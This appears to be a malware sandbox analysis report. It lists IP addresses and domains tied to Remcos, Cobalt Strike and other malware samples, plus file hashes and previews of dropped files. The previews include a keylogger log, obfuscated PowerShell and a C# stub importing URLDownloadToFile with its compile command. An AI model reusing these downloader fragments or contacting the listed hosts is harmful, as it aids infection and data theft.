                                                                                                                                                          Plugin81139.jsGet hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                                                                                          • 151.101.129.137
                                                                                                                                                          PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 151.101.129.137
                                                                                                                                                          New Order Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                          • 151.101.193.137
                                                                                                                                                          paste.eeCot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 188.114.97.6
                                                                                                                                                          SOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 188.114.97.6
                                                                                                                                                          Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 188.114.96.6
                                                                                                                                                          print preview.jsGet hashmaliciousFormBookBrowse
                                                                                                                                                          • 172.67.187.200
                                                                                                                                                          nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                                          • 104.21.84.67
                                                                                                                                                          nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                                          • 104.21.84.67
                                                                                                                                                          invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 188.114.97.6
                                                                                                                                                          Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 188.114.97.6
                                                                                                                                                          PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 104.21.84.67
                                                                                                                                                          NESTLE_MEXICO_Purchase_Order_10122024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 188.114.97.6
                                                                                                                                                          geoplugin.netSwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 178.237.33.50
                                                                                                                                                          WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 178.237.33.50
                                                                                                                                                          4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 178.237.33.50
                                                                                                                                                          fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 178.237.33.50
                                                                                                                                                          IXCbn4ZcdS.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 178.237.33.50
                                                                                                                                                          d7gXUPUl38.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 178.237.33.50
                                                                                                                                                          3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 178.237.33.50
                                                                                                                                                          ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 178.237.33.50
                                                                                                                                                          pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 178.237.33.50
                                                                                                                                                          sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 178.237.33.50
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          FASTLYUScreamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                                          • 151.101.1.137
                                                                                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                          • 151.101.129.91
                                                                                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                          • 151.101.129.91
                                                                                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                          • 151.101.193.91
                                                                                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                          • 151.101.129.91
                                                                                                                                                          http://18.224.21.137/FFmnpShhHMMWeIqsVa2rJ69xinQlZ-7450Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 151.101.194.137
                                                                                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                          • 151.101.129.91
                                                                                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                          • 151.101.129.91
                                                                                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                          • 151.101.1.91
                                                                                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                          • 151.101.193.91
                                                                                                                                                          AS-COLOCROSSINGUScreamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                                          • 192.210.150.24
                                                                                                                                                          Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 192.210.150.24
                                                                                                                                                          SOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 107.172.44.175
                                                                                                                                                          Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 23.95.235.29
                                                                                                                                                          SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 192.210.150.17
                                                                                                                                                          Document.xlaGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 107.172.44.175
                                                                                                                                                          Document.xlaGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 107.172.44.175
                                                                                                                                                          Document.xlaGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 107.172.44.175
                                                                                                                                                          Document.xlaGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 107.172.44.175
                                                                                                                                                          nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                                          • 172.245.142.60
                                                                                                                                                          ATOM86-ASATOM86NLSwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 178.237.33.50
                                                                                                                                                          WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 178.237.33.50
                                                                                                                                                          4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 178.237.33.50
                                                                                                                                                          fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 178.237.33.50
                                                                                                                                                          IXCbn4ZcdS.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 178.237.33.50
                                                                                                                                                          d7gXUPUl38.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 178.237.33.50
                                                                                                                                                          3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 178.237.33.50
                                                                                                                                                          ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 178.237.33.50
                                                                                                                                                          pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 178.237.33.50
                                                                                                                                                          sXpIsdpkzy.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 178.237.33.50
                                                                                                                                                          AS-COLOCROSSINGUScreamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                                          • 192.210.150.24
                                                                                                                                                          Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 192.210.150.24
                                                                                                                                                          SOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 107.172.44.175
                                                                                                                                                          Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 23.95.235.29
                                                                                                                                                          SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 192.210.150.17
                                                                                                                                                          Document.xlaGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 107.172.44.175
                                                                                                                                                          Document.xlaGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 107.172.44.175
                                                                                                                                                          Document.xlaGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 107.172.44.175
                                                                                                                                                          Document.xlaGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 107.172.44.175
                                                                                                                                                          nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                                          • 172.245.142.60
                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0ecreamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                                          • 104.21.84.67
                                                                                                                                                          • 151.101.1.137
                                                                                                                                                          file.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                                                          • 104.21.84.67
                                                                                                                                                          • 151.101.1.137
                                                                                                                                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                          • 104.21.84.67
                                                                                                                                                          • 151.101.1.137
                                                                                                                                                          ShareGate.24.12.1.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.84.67
                                                                                                                                                          • 151.101.1.137
                                                                                                                                                          http://mavenclinic.quatrix.itGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.84.67
                                                                                                                                                          • 151.101.1.137
                                                                                                                                                          c2.htaGet hashmaliciousXWormBrowse
                                                                                                                                                          • 104.21.84.67
                                                                                                                                                          • 151.101.1.137
                                                                                                                                                          Hydra.ccLoader.batGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.21.84.67
                                                                                                                                                          • 151.101.1.137
                                                                                                                                                          4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 104.21.84.67
                                                                                                                                                          • 151.101.1.137
                                                                                                                                                          full.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                          • 104.21.84.67
                                                                                                                                                          • 151.101.1.137
                                                                                                                                                          fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                          • 104.21.84.67
                                                                                                                                                          • 151.101.1.137
                                                                                                                                                          No context
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):144
                                                                                                                                                          Entropy (8bit):3.369034834541982
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:rhlKlyKNlfVlOUlNRlHeDl5JWRal2Jl+7R0DAlBG45klovDl6v:6lZNlHXNC55YcIeeDAlOWAv
                                                                                                                                                          MD5:F7863B1068314DB664D120B591D71CA8
                                                                                                                                                          SHA1:D28DA5D4230435645B382141887C1AF0E5ED533D
                                                                                                                                                          SHA-256:7088ED4B2EFFBCBD9945A169CF7F9F76264433F34BAEBF496584104F34773551
                                                                                                                                                          SHA-512:C81983152EF855EEFAE72B28899192A49025937B3604BDFE0D3532FFA70EBBDEE2E65EA57E0F459898B18DA86CE4647E096DF4D4B3EF76D51CBA5C2F6F649683
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                                          Preview:....[.2.0.2.4./.1.2./.1.3. .0.1.:.3.8.:.4.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (3102), with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):153774
                                                                                                                                                          Entropy (8bit):3.794572563673094
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:rhOJJc6EynAswUs9Oau841fvkpWKj5fhOJJc6EynAswUs9Oau841fvkpWKjhhOJw:rOLEIpwPRs36WKJOLEIpwPRs36WKtOLs
                                                                                                                                                          MD5:61BCBE69140CDEE35AC40F1D97773746
                                                                                                                                                          SHA1:BB5D746ECA7A18890B642E6952EB9C5F71DEDAAA
                                                                                                                                                          SHA-256:D68723EDCF3FF4F0C7DED177C7EEBD74DF498B8D16B111FAC54F1C11E37C93CF
                                                                                                                                                          SHA-512:303EE3B3B8620F536C3E298BD65557BADF251870CA46656741C8D787A351F3ABCA94FE39BB701563AEF9C7C85F89BBDB447704E1F5BCE1B63701F575DB5E4B0B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:...... . . . .....c.U.U.O.W.U.v.z.v.f.n.p.h.B.m. .=. .".W.x.Q.e.K.L.L.v.b.W.N.b.v.Q.k.".....c.c.e.U.J.o.G.b.k.K.G.h.L.m.d. .=. .".G.W.L.z.L.p.e.L.W.t.O.U.i.G.K.".....r.K.W.i.K.P.K.W.q.W.W.e.N.c.W. .=. .".B.K.c.L.a.K.r.W.Z.i.K.h.W.A.p.".........a.o.k.l.L.q.d.L.a.p.i.s.W.c.G. .=. .".p.n.W.L.n.A.s.Q.e.n.Z.J.j.B.p.".....v.U.S.i.W.c.i.K.S.m.L.B.G.q.j. .=. .".f.p.b.K.K.P.m.n.e.k.k.L.W.u.k.".....i.U.c.A.W.u.I.L.K.S.K.U.L.u.j. .=. .".r.L.b.W.i.U.G.R.o.n.r.m.T.U.q.".....H.c.J.K.W.k.h.i.i.K.c.J.G.G.A. .=. .".G.k.s.Z.W.v.e.O.c.b.L.x.W.i.R.".....z.e.m.L.K.b.L.A.K.A.h.W.e.o.f. .=. .".C.p.i.W.z.G.W.d.c.s.K.N.o.l.K.".....x.L.p.x.i.K.L.o.o.L.m.u.t.m.h. .=. .".J.t.h.G.c.T.L.e.x.m.L.W.c.W.i.".....c.q.B.a.L.h.Z.U.I.C.N.h.K.b.l. .=. .".e.r.f.W.K.L.e.g.L.B.P.b.f.U.W.".....W.q.f.K.z.h.K.b.N.e.a.K.g.L.W. .=. .".x.W.L.f.W.G.i.C.G.C.q.k.c.e.c.".....q.K.I.k.b.p.t.p.b.C.W.U.K.G.u. .=. .".u.h.m.P.a.c.t.n.W.S.W.H.G.G.W.".....R.z.m.R.v.L.L.O.K.G.J.a.x.W.W. .=. .".u.c.a.z.B.e.l.o.Z.o.h.d.K.c.z.".....L.n.G.N.U.Z.T.m.
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):963
                                                                                                                                                          Entropy (8bit):5.0171130712019085
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:tkluWJmnd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkD:qlupdbauKyGX85jvXhNlT3/7CcVKWro
                                                                                                                                                          MD5:0A55905951B6633AC409C89A600E5B38
                                                                                                                                                          SHA1:A8D63D48564E1A2F3C222B98C163E9B541042DA2
                                                                                                                                                          SHA-256:1E06332C729A91A1DBE6ABE75457CA239DAB2B3EC27E3AAC6BD57D357EF35FEC
                                                                                                                                                          SHA-512:99BE9B0C66C0C52F9F96B764146382DF6A93CF4EC053219903C2B7316136DDAA7E4510EBB5D4BADE50685C6A77F52FD81F594A22D7BF147576F464C3FAABD486
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5829
                                                                                                                                                          Entropy (8bit):4.901113710259376
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                                                                          MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                                                                          SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                                                                          SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                                                                          SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1144
                                                                                                                                                          Entropy (8bit):5.290848674040258
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:32gSKco4KmZjKbmOIKod6emZ9tYs4RPQoUEJ0gt/NKM9rgd:GgSU4xympjmZ9tz4RIoUl8NF9C
                                                                                                                                                          MD5:F262C231D15773CB65C99F7B6AD6A81C
                                                                                                                                                          SHA1:5DE14E5014654D233C869A4CA47BACF3E1120A1D
                                                                                                                                                          SHA-256:2A76444C5964969A6D590232EB13C41FA85F6D4DC94E693593A8681ED2C46581
                                                                                                                                                          SHA-512:23A1D7849A86E9E619D942165F34196D00D7967493BBA5CDE78190F7E2055072F2AB0CD8081739D513FC4197592D621B5DE70FCC6DB80DA5B1BB564430583F9F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:@...e...........................................................@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (370)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):483
                                                                                                                                                          Entropy (8bit):3.7055245437561335
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:V/DsYLDS81zumywWHMGbjQXReKJ8SRHy4H1r3TbAc/uc4y:V/DTLDfu1wXfHRn8c6y
                                                                                                                                                          MD5:567F2C2AF7886BD10A602EDEA0DBB33B
                                                                                                                                                          SHA1:AAA2F286D79889F3AE9CD98B9B728F832A0981BD
                                                                                                                                                          SHA-256:942B49DF85678ADA85046144CAC22EE63E865763EA87B1AB1AA56E86E8FE2DAC
                                                                                                                                                          SHA-512:8CE20E4DFF36398AA1B520C2959907662216003C20085CC6ECF1E612E4005683B187AFBE423C3D7A3BDB7DA16995526894F264EC4094D3741573EEBC7FC35C4C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.using System;.using System.Runtime.InteropServices;..namespace eG.{. public class SrgpCje. {. [DllImport("urlmon.dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr DQJ,string QDlMltZdCJ,string DmhIGJsMxfC,uint l,IntPtr CvkghJ);.. }..}.
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):369
                                                                                                                                                          Entropy (8bit):5.297288805809713
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f/GM/+zxs7+AEszIwkn23f/GMbn:p37Lvkmb6KRfWMGWZEifWMbn
                                                                                                                                                          MD5:80A8D2B83FC7C83282BF29DABD8DFDB9
                                                                                                                                                          SHA1:A1582D7A607278582A90F3A605399171BDE44B1D
                                                                                                                                                          SHA-256:14B53CD0BFD40B11EAB3C22BCE5A7C3CCBA9C1B9B54E1159D97B2385BD484F0C
                                                                                                                                                          SHA-512:6175826ADE8E86D7EA1EC25A67917848CB66B17CB9E88C6E9ED8891C5745CA4E28FB1555F3C0AD73AC5096637517CE8626AEE86C8268AAA1340A6AAD2F6E8E29
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.0.cs"
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3072
                                                                                                                                                          Entropy (8bit):2.837371986573088
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:etGSVPBe5ekrl8y72fukzOCa0HZLWtkZfFcobCZ0WI+ycuZhNmlGakS5lXPNnq:6Oskr+vf3OCZZJFzbCZX1ulmYa35Xq
                                                                                                                                                          MD5:174D0E93141973421415B3EBFBD3C459
                                                                                                                                                          SHA1:7B663D5CE556EA9AEDAEF8D16A03D37DA6CA9217
                                                                                                                                                          SHA-256:7BCF1B2BEA56D1FEF3E35B1030730384CCA9BB646EE3D75DCC880B72812EFD9F
                                                                                                                                                          SHA-512:87922D0860F7EE84102175F02B79290057D9DBAA0A60D6562C0BE2E2A3A3C5A054A675DE76C52E6344197592623F83825ABE0FF4DEB4BB0A50ADFA69B6C0FA52
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...U.[g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................2.+.....u.....u.......................................... 9.....P ......K.........Q.....U.....`.....l.....n...K.....K...!.K.....K.......!.....*.......9......................................."..........<Module>.1w
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                                                                                                                          Category:modified
                                                                                                                                                          Size (bytes):867
                                                                                                                                                          Entropy (8bit):5.324666923276244
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:KJBqd3ka6KRfW4EifW2uKax5DqBVKVrdFAMBJTH:Cika6CXEuaK2DcVKdBJj
                                                                                                                                                          MD5:234B71DA1AD8B6D28977321EC9FF424F
                                                                                                                                                          SHA1:88E753CA8750B9AD7AD885834E15FDC39D1E1074
                                                                                                                                                          SHA-256:EE933C8C0C4CE921F6908322011892DE74CD008E7E66BF539E1017A4D4C0BA18
                                                                                                                                                          SHA-512:6C0FE1D04D62BC5CC2CC9DD76D528822A4DCA6118F12799162353A2DBF053F28C4E01F50043B6B5A0DE3834369B2821DFCD79C24CAEB4841EC5B7D231898C6F5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                          File Type:MSVC .res
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):652
                                                                                                                                                          Entropy (8bit):3.1163586040999833
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryIlGak7Ynqq5lXPN5Dlq5J:+RI+ycuZhNmlGakS5lXPNnqX
                                                                                                                                                          MD5:038296F20E5A0BE53F41DA22D92030C8
                                                                                                                                                          SHA1:52B1F27F226BF9D43ABDA9D6C1F492047F005511
                                                                                                                                                          SHA-256:C0EE2D8F289CD554A1814F3D98123436965F7CFBE3020C7B011B9DC8E913FEEF
                                                                                                                                                          SHA-512:9D036139C2A7CA6B3A7E2C80B13B70D249D941F0E1A01857FC94DD1A0A28959EA2204C616B49DDA447B0388DFD7EBCB5BC70EBA63F513FA1762AC0BDE4216FD0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.w.f.2.p.r.h.w...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.w.f.2.p.r.h.w...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Dec 13 08:03:33 2024, 1st section name ".debug$S"
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1328
                                                                                                                                                          Entropy (8bit):3.9866842641550453
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:HLe9E2+fr9muXDfHVwKEbsmfII+ycuZhNmlGakS5lXPNnqSqd:NrXzWKPmg1ulmYa35XqSK
                                                                                                                                                          MD5:D49C954FC6DED1AE1952D43D79D253EA
                                                                                                                                                          SHA1:6509681313F0EA284D22C057FAB3ADEC317A4D92
                                                                                                                                                          SHA-256:D628723D1FF26CB90D67C1294FB7F9C58B9CB28B62141588796661D8D908B266
                                                                                                                                                          SHA-512:34A96E307680FD86B106B682A0A630AB43B4C5E0F6A640536AED37A6D64E139D49879DB6A1FEE993FD485F214C0DB71569C9FE86F4A4DB83F087B6575E4E82EC
                                                                                                                                                          Malicious:false
